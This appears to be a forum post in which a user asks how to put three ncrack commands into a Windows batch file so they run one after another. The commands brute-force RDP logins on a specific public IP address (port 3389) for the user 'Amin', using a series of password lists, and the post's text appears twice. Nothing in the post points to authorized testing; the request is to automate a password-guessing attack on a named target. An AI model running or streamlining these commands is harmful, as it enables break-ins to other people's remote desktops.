how to run this? one by one
I open cmd.exe and i paste manually that code one by one how to run this 3 string automatically in a batch file?
After 1'st list finishing starts the second and then starting the 3'rd
ncrack -v --user Amin -P super1.txt 5.2.182.200:3389
ncrack -v --user Amin -P super2.txt 5.2.182.200:3389
ncrack -v --user Amin -P super3.txt 5.2.182.200:3389
i tried this but not good results
echo@off
start /wait ncrack -v --user Amin -P super1.txt 5.2.182.200:3389
start /wait ncrack -v --user Amin -P super2.txt 5.2.182.200:3389
start /wait ncrack -v --user Amin -P super3.txt 5.2.182.200:3389
I open cmd.exe and i paste manually that code one by one how to run this 3 string automatically in a batch file?
After 1'st list finishing starts the second and then starting the 3'rd
ncrack -v --user Amin -P super1.txt 5.2.182.200:3389
ncrack -v --user Amin -P super2.txt 5.2.182.200:3389
ncrack -v --user Amin -P super3.txt 5.2.182.200:3389
i tried this but not good results
echo@off
start /wait ncrack -v --user Amin -P super1.txt 5.2.182.200:3389
start /wait ncrack -v --user Amin -P super2.txt 5.2.182.200:3389
start /wait ncrack -v --user Amin -P super3.txt 5.2.182.200:3389
My Computer
- Computer type
- PC/Desktop
- OS
- windows xp c86